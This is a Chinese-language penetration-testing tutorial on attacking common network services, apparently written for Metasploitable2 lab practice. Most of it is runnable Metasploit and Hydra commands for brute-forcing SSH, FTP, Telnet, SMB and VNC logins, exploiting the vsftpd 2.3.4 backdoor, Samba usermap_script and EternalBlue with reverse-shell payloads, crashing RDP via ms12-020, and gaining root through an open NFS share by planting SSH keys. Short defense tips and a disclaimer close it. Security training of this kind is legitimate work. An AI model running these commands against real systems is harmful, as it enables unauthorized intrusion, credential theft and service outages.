针对系统服务的攻击尝试
字数 2876 2025-08-06 21:48:53
针对系统服务的渗透攻击技术详解
0x00 前言
在网络安全渗透测试中,通过识别目标IP开放的端口可以判断运行的服务类型,进而获取更多信息。本教学文档将详细讲解如何针对常见系统服务端口进行进一步的渗透攻击。
0x01 常见系统服务端口及攻击方向
| 端口号 | 服务说明 | 主要攻击方向 |
|---|---|---|
| 22 | SSH | 爆破攻击、SSH隧道及内网代理转发、文件传输 |
| 23 | Telnet | 爆破攻击、嗅探、弱口令利用 |
| 25 | SMTP | 用户枚举、邮件伪造 |
| 53 | DNS | DNS溢出攻击、DNS欺骗、拒绝服务攻击 |
| 110 | POP3 | 爆破攻击、弱口令利用、邮件伪造 |
| 135 | RPC | 远程溢出攻击、弱口令利用 |
| 139/445 | SMB | 永恒之蓝漏洞利用、SAMBA漏洞利用、爆破攻击 |
| 161 | SNMP | 爆破攻击、搜集目标内网信息 |
| 2049 | NFS | 共享目录配置漏洞利用、未授权访问 |
| 3389 | RDP | ms12-020漏洞利用、Shift后门、输入法漏洞、CVE-2019-0708漏洞利用 |
| 5900 | VNC | 弱口令爆破、密码验证绕过漏洞、拒绝服务攻击 |
| 5632 | PyAnywhere服务 | 密码抓取、代码执行 |
0x02 Metasploit框架基础
核心概念
- 渗透攻击(Exploit): 利用目标系统漏洞进行的攻击行为
- 攻击载荷(Payload): 目标系统被渗透后执行的代码,如反弹式shell
- 溢出代码(Shellcode): 作为攻击载荷运行的一组机器指令,通常用汇编语言编写
- 模块(Module): MSF框架中使用的软件代码组件
- 监听器(Listener): 用于等待网络连接的组件
0x03 靶机环境准备
推荐使用Metasploitable2(Linux)作为测试环境:
- 特别制作的Ubuntu操作系统,包含多种安全漏洞
- 兼容VMware、VirtualBox等虚拟平台
- 默认账号密码:msfadmin/msfadmin
- 警告:不要将此镜像暴露在易受攻击的网络中
0x04 SSH(22)服务攻击
攻击方法
-
使用Metasploit进行SSH爆破:
msfconsole search ssh_login use auxiliary/scanner/ssh/ssh_login show options set RHOSTS <target_ip> set USERNAME root set PASS_FILE /path/to/passwords.txt set THREADS 5 run -
成功后的连接:
ssh root@<target_ip>
0x05 FTP(21)服务攻击
攻击方法
-
VSFTPD 2.3.4后门利用:
- 当USER包含":)"时触发6200端口后门
- Metasploit利用:
use exploit/unix/ftp/vsftpd_234_backdoor set RHOST <target_ip> exploit
-
Hydra爆破攻击:
hydra -L users.txt -P passwords.txt <target_ip> ftp
0x06 Telnet(23)服务攻击
攻击方法
-
使用Metasploit爆破:
use auxiliary/scanner/telnet/telnet_login set RHOSTS <target_ip> set USER_FILE /path/to/users.txt set PASS_FILE /path/to/passwords.txt run -
版本扫描:
use auxiliary/scanner/telnet/telnet_version set RHOSTS <target_ip> run
0x07 DNS(53)服务攻击
攻击方法
-
DNS溢出攻击:
- 使用远程溢出漏洞获取系统权限
- 通过nc等工具连接获取shell
-
DNS欺骗攻击:
- 结合网页木马、挂马等进行欺骗攻击
-
拒绝服务攻击:
- 使用DDOS技术使服务不可用
0x08 SMB(139/445)服务攻击
攻击方法
-
SMB爆破(139):
use auxiliary/scanner/smb/smb_login set RHOSTS <target_ip> set SMBUser administrator set SMBPass password run -
SAMBA漏洞利用(445):
use exploit/multi/samba/usermap_script set RHOST <target_ip> set payload cmd/unix/reverse exploit -
永恒之蓝漏洞(MS17-010):
- 探测漏洞:
use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS <target_ip> run - 漏洞利用:
use exploit/windows/smb/ms17_010_eternalblue set RHOST <target_ip> set payload windows/x64/meterpreter/reverse_tcp set LHOST <your_ip> exploit
- 探测漏洞:
0x09 RDP(3389)服务攻击
攻击方法
-
ms12-020漏洞利用:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids set RHOST <target_ip> exploit -
Shift粘滞键后门:
- 适用于Windows Server 2003以下系统
- 连续按5次Shift键触发
-
CVE-2019-0708漏洞验证:
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep set RHOSTS <target_ip> run
0x10 NFS(2049)服务攻击
攻击方法
-
查看共享目录:
showmount -e <target_ip>或使用Metasploit:
use auxiliary/scanner/nfs/nfsmount set RHOSTS <target_ip> run -
未授权访问利用:
mkdir /temp mount -t nfs <target_ip>:/ /temp -o nolock -
获取Shell:
- 通过修改authorized_keys文件添加SSH公钥
- 建立SSH连接:
ssh -i /root/.ssh/id_rsa root@<target_ip>
0x11 RPC(135)服务攻击
攻击方法
-
RPC溢出攻击:
- 使用工具如DSScan扫描漏洞
- 使用ms05011.exe进行溢出攻击
-
弱口令利用:
- 使用Hydra爆破
- 通过RPC开启telnet服务并执行命令
0x12 VNC(5900)服务攻击
攻击方法
- 密码验证绕过漏洞利用
- Cain嗅探攻击
- 注册表读取破解密码
- 拒绝服务攻击(CVE-2015-5239)
- 权限提升(CVE-2013-6886)
- 爆破攻击:
- 使用Hydra:
hydra -P passwords.txt <target_ip> vnc - 使用Metasploit:
use auxiliary/scanner/vnc/vnc_login set RHOSTS <target_ip> run
- 使用Hydra:
0x13 SMTP(25/465)服务攻击
攻击方法
-
用户枚举:
use auxiliary/scanner/smtp/smtp_enum set RHOSTS <target_ip> run -
版本扫描:
use auxiliary/scanner/smtp/smtp_version set RHOSTS <target_ip> run -
未授权访问利用
-
邮件伪造攻击
0x14 POP3(109/110/995)服务攻击
攻击方法
- 爆破攻击
- 弱口令利用
- 未授权访问
- 邮件伪造:在关键时刻可能有奇效
0x15 防御建议
- 及时更新系统和应用补丁
- 禁用不必要的服务和端口
- 使用强密码策略
- 配置适当的访问控制
- 启用日志记录和监控
- 定期进行安全审计
0x16 免责声明
本文档仅供学习研究和合法授权测试使用,严禁用于非法活动。任何使用本文档技术进行非法攻击的行为,均由使用者本人承担全部法律责任。